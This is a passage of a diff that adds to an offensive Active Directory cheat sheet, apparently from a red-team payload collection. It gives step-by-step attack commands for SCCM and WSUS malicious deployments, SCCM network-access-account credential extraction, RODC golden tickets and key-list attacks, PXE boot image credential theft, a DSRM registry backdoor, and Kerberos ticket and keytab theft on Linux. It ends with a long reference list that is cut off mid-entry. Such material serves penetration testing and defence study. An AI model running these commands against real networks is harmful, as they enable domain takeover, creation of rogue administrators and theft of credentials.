applications to hosts they manage](https://github.com/nettitude/MalSCCM) + + +* Using **SharpSCCM** + ```ps1 + .\SharpSCCM.exe get device --server --site-code + .\SharpSCCM.exe exec -d -r + .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug + ``` +* Compromise client, use locate to find management server + ```ps1 + MalSCCM.exe locate + ``` +* Enumerate over WMI as an administrator of the Distribution Point + ```ps1 + MalSCCM.exe inspect /server: /groups + ``` +* Compromise management server, use locate to find primary server +* Use `inspect` on primary server to view who you can target + ```ps1 + MalSCCM.exe inspect /all + MalSCCM.exe inspect /computers + MalSCCM.exe inspect /primaryusers + MalSCCM.exe inspect /groups + ``` +* Create a new device group for the machines you want to laterally move too + ```ps1 + MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device + MalSCCM.exe inspect /groups + ``` + +* Add your targets into 
the new group + ```ps1 + MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL + ``` +* Create an application pointing to a malicious EXE on a world readable share : `SCCMContentLib$` + ```ps1 + MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe" + MalSCCM.exe inspect /applications + ``` + +* Deploy the application to the target group + ```ps1 + MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment + MalSCCM.exe inspect /deployments + ``` +* Force the target group to checkin for updates + ```ps1 + MalSCCM.exe checkin /groupname:TargetGroup + ``` + +* Cleanup the application, deployment and group + ```ps1 + MalSCCM.exe app /cleanup /name:demoapp + MalSCCM.exe group /delete /groupname:TargetGroup + ``` + + +## SCCM Network Access Accounts + +> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. + +On the machine. +* Find SCCM blob + ```ps1 + Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" + NetworkAccessPassword : + NetworkAccessUsername : + ``` +* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) or [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption + ```ps1 + .\SharpDPAPI.exe SCCM + .\SharpSCCM.exe get naa -u USERNAME -p PASSWORD + ``` +* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`: + ```ps1 + Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl + ConvertFrom-SddlString "" + ``` + +From a remote machine. +* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter) + ```ps1 + python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. 
-auto + ``` + + +## SCCM Shares + +> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares + +* [1njected/CMLoot](https://github.com/1njected/CMLoot) + ```ps1 + Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt + Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml + Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi + ``` + + +## WSUS Deployment + +> Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. You can use WSUS to fully manage the distribution of updates that are released through Microsoft Update to computers on your network + +:warning: The payload must be a Microsoft signed binary and must point to a location on disk for the WSUS server to load that binary. + +* [SharpWSUS](https://github.com/nettitude/SharpWSUS) + +1. Locate using `HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate` or `SharpWSUS.exe locate` +2. After WSUS Server compromise: `SharpWSUS.exe inspect` +3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add ^& net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"` +4. Deploy it on the target: `SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"` +5. Check status deployment: `SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local` +6. 
Clean up: `SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group` + +## RODC - Read Only Domain Controller + +RODCs are an alternative for Domain Controllers in less secure physical locations +- Contains a filtered copy of AD (LAPS and Bitlocker keys are excluded) +- Any user or group specified in the **managedBy** attribute of an RODC has local admin access to the RODC server + + +### RODC Golden Ticket + +* You can forge an RODC golden ticket and present it to a writable Domain Controller only for principals listed in the RODC’s **msDS-RevealOnDemandGroup** attribute and not in the RODC’s **msDS-NeverRevealGroup** attribute + + +### RODC Key List Attack + +**Requirements**: +* [Impacket PR #1210 - The Kerberos Key List Attack](https://github.com/SecureAuthCorp/impacket/pull/1210) +* **krbtgt** credentials of the RODC (-rodcKey) +* **ID of the krbtgt** account of the RODC (-rodcNo) + +* using Impacket + ```ps1 + # keylistattack.py using SAMR user enumeration without filtering (-full flag) + keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full + + # keylistattack.py defining a target username (-t flag) + keylistattack.py -kdc server.domain.local -t user -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX LIST + + # secretsdump.py using the Kerberos Key List Attack option (-use-keylist) + secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist + ``` +* Using Rubeus + ```ps1 + Rubeus.exe golden /rodcNumber:25078 /aes256:eacd894dd0d934e84de35860ce06a4fac591ca63c228ddc1c7a0ebbfa64c7545 /user:admin /id:1136 /domain:lab.local /sid:S-1-5-21-1437000690-1664695696-1586295871 + Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/lab.local /dc:dc1.lab.local /ticket:doIFgzCC[...]wIBBxhYnM= + ``` + + +### RODC Computer Object + +When you have one the following permissions to the RODC computer object: **GenericWrite**, 
**GenericAll**, **WriteDacl**, **Owns**, **WriteOwner**, **WriteProperty**. + +* Add a domain admin account to the RODC's **msDS-RevealOnDemandGroup** attribute + ```ps1 + PowerSploit> Set-DomainObject -Identity RODC$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')} + ``` + + +## PXE Boot image attack + +PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it. + +- Press **[F8]** during the PXE boot to spawn an administrator console on the deployed machine. +- Press **[SHIFT+F10]** during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry. + + ```powershell + net user hacker Password123! /add + net localgroup administrators /add hacker + ``` + +- Extract the pre-boot image (wim files) using [PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe)](https://github.com/wavestone-cdt/powerpxe) and dig through it to find default passwords and domain accounts. + + ```powershell + # Import the module + PS > Import-Module .\PowerPXE.ps1 + + # Start the exploit on the Ethernet interface + PS > Get-PXEcreds -InterfaceAlias Ethernet + PS > Get-PXECreds -InterfaceAlias ÂŤ lab 0 Âť + + # Wait for the DHCP to get an address + >> Get a valid IP address + >>> >>> DHCP proposal IP address: 192.168.22.101 + >>> >>> DHCP Validation: DHCPACK + >>> >>> IP address configured: 192.168.22.101 + + # Extract BCD path from the DHCP response + >> Request BCD File path + >>> >>> BCD File path: \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd + >>> >>> TFTP IP Address: 192.168.22.3 + + # Download the BCD file and extract wim files + >> Launch TFTP download + >>>> Transfer succeeded. 
+ >> Parse the BCD file: conf.bcd + >>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim + >>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim + >> Launch TFTP download + >>>> Transfer succeeded. + + # Parse wim files to find interesting data + >> Open LiteTouchPE_x86.wim + >>>> Finding Bootstrap.ini + >>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$ + >>>> >>>> UserID = MdtService + >>>> >>>> UserPassword = Somepass1 + ``` + +## DNS Reconnaissance + +Perform ADIDNS searches + +```powershell +StandIn.exe --dns --limit 20 +StandIn.exe --dns --filter SQL --limit 10 +StandIn.exe --dns --forest --domain redhook --user RFludd --pass Cl4vi$Alchemi4e +StandIn.exe --dns --legacy --domain redhook --user RFludd --pass Cl4vi$Alchemi4e +``` + +## DSRM Credentials + +> Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or recover to repair or restore an Active Directory database. + +This is the local administrator account inside each DC. Having admin privileges in this machine, you can use mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user. + +```ps1 +Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' + +# Check if the key exists and get the value +Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior + +# Create key with value "2" if it doesn't exist +New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD + +# Change value to "2" +Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 +``` + + +## Linux Active Directory + +## CCACHE ticket reuse from /tmp + +> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. 
This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions + +List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID. + +```powershell +$ ls /tmp/ | grep krb5cc +krb5cc_1000 +krb5cc_1569901113 +krb5cc_1569901115 + +$ export KRB5CCNAME=/tmp/krb5cc_1569901115 +``` + + +## CCACHE ticket reuse from keyring + +Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey + +```powershell +# Configuration and build +git clone https://github.com/TarlogicSecurity/tickey +cd tickey/tickey +make CONF=Release + +[root@Lab-LSV01 /]# /tmp/tickey -i +[*] krb5 ccache_name = KEYRING:session:sess_%{uid} +[+] root detected, so... DUMP ALL THE TICKETS!! +[*] Trying to inject in tarlogic[1000] session... +[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache +[*] Trying to inject in velociraptor[1120601115] session... +[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache +[*] Trying to inject in trex[1120601113] session... +[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache +[X] [uid:0] Error retrieving tickets +``` + +## CCACHE ticket reuse from SSSD KCM + +SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. +The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. +By default, the key is only readable if you have **root** permissions. + +Invoking `SSSDKCMExtractor` with the --database and --key parameters will parse the database and decrypt the secrets. 
+ +```powershell +git clone https://github.com/fireeye/SSSDKCMExtractor +python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey +``` + +The credential cache Kerberos blob can be converted into a usable Kerberos CCache file that can be passed to Mimikatz/Rubeus. + + +## CCACHE ticket reuse from keytab + +```powershell +git clone https://github.com/its-a-feature/KeytabParser +python KeytabParser.py /etc/krb5.keytab +klist -k /etc/krb5.keytab +``` + +## Extract accounts from /etc/krb5.keytab + +The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure. + +Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user. + +```powershell +$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab +[...] +[26] Service principal: host/COMPUTER@DOMAIN + KVNO: 25 + Key type: 23 + Key: 31d6cfe0d16ae931b73c59d7e0c089c0 + Time stamp: Oct 07, 2019 09:12:02 +[...] +``` + +On Linux you can use [`KeyTabExtract`](https://github.com/sosdave/KeyTabExtract): we want RC4 HMAC hash to reuse the NLTM hash. + +```powershell +$ python3 keytabextract.py krb5.keytab +[!] No RC4-HMAC located. Unable to extract NTLM hashes. # No luck +[+] Keytab File successfully imported. + REALM : DOMAIN + SERVICE PRINCIPAL : host/computer.domain + NTLM HASH : 31d6cfe0d16ae931b73c59d7e0c089c0 # Lucky +``` + +On macOS you can use `bifrost`. + +```powershell +./bifrost -action dump -source keytab -path test +``` + +Connect to the machine using the account and the hash with CME. 
+ +```powershell +$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN" +CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 +``` + + +## Extract accounts from /etc/sssd/sssd.conf + +> sss_obfuscate converts a given password into human-unreadable format and places it into appropriate domain section of the SSSD config file, usually located at /etc/sssd/sssd.conf + +The obfuscated password is put into "ldap_default_authtok" parameter of a given SSSD domain and the "ldap_default_authtok_type" parameter is set to "obfuscated_password". + +```ini +[sssd] +config_file_version = 2 +... +[domain/LDAP] +... +ldap_uri = ldap://127.0.0.1 +ldap_search_base = ou=People,dc=srv,dc=world +ldap_default_authtok_type = obfuscated_password +ldap_default_authtok = [BASE64_ENCODED_TOKEN] +``` + +De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_deobfuscate](https://github.com/mludvig/sss_deobfuscate) + +```ps1 +./sss_deobfuscate [ldap_default_authtok_base64_encoded] +./sss_deobfuscate AAAQABagVAjf9KgUyIxTw3A+HUfbig7N1+L0qtY4xAULt2GYHFc1B3CBWGAE9ArooklBkpxQtROiyCGDQH+VzLHYmiIAAQID +``` + + +## References + +* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) +* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) +* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) +* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) +* [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence) +* [Attacks Against Windows PXE Boot Images - 
February 13th, 2018 - Thomas Elling](https://blog.netspi.com/attacks-against-windows-pxe-boot-images/) +* [BUILDING AND ATTACKING AN ACTIVE DIRECTORY LAB WITH POWERSHELL - @myexploit2600 & @5ub34x](https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/) +* [Becoming Darth Sidious: Creating a Windows Domain (Active Directory) and hacking it - @chryzsh](https://chryzsh.gitbooks.io/darthsidious/content/building-a-lab/building-a-lab/building-a-small-lab.html) +* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf) +* [COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - RĂŠmi Escourrou, Cyprien Oger ](https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE) +* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) +* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) +* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/) +* [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/) +* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/) +* [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/) +* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/) +* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288) +* [How Attackers Use 
Kerberos Silver Tickets to Exploit Systems - Sean Metcalf](https://adsecurity.org/?p=2011) +* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) +* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html) +* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html) +* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/) +* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/) +* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) +* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) +* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/) +* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) +* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/) +* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/) +* [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/) +* [Pen Testing Active Directory Environments - Part IV: Graph 
Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/) +* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/) +* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/) +* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/) +* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/) +* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) +* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/) +* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) +* [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/) +* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) +* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) +* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? 
- 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) +* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) +* [A Case Study in Wagging the Dog: Computer Takeover - Will Schroeder - Feb 28, 2019](https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783) +* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) +* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) +* [Kerberos (II): How to attack Kerberos? 
- June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) +* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) +* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) +* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) +* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) +* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) +* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) +* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) +* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) +* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) +* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) +* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 
10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) +* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) +* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/) +* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/) +* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) +* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html) +* [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/) +* [Zerologon:Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) - Tom Tervoort, September 2020](https://www.secura.com/pathtoimg.php?id=2055) +* [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces) +* [CVE-2020-17049: Kerberos Bronze Bit Attack – Practical Exploitation - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/) +* [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/) +* [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory) +* [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/) +* [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) +* [New lateral 
movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques) +* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) +* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/) +* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab) +* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) +* [Attacking Active Directory: 0 to 0.9 - Eloy PĂŠrez GonzĂĄlez - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/) +* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/) +* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) +* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) +* [Certified Pre-Owned Abusing Active Directory Certificate Services - @harmj0y @tifkin_](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf) +* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2) +* [AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps by frank | Jul 23, 2021](https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/) +* [NTLMv1_Downgrade.md - S3cur3Th1sSh1t 
- 09/07/2021](https://gist.github.com/S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb) +* [UnPAC the hash - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash) +* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/) +* [Shadow Credentials: Workstation Takeover Edition - Matthew Creel](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition) +* [Certificate templates - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-templates) +* [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration) +* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) +* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) +* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) +* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) +* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) +* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) +* [AD CS: weaponizing the ESC7 attack - 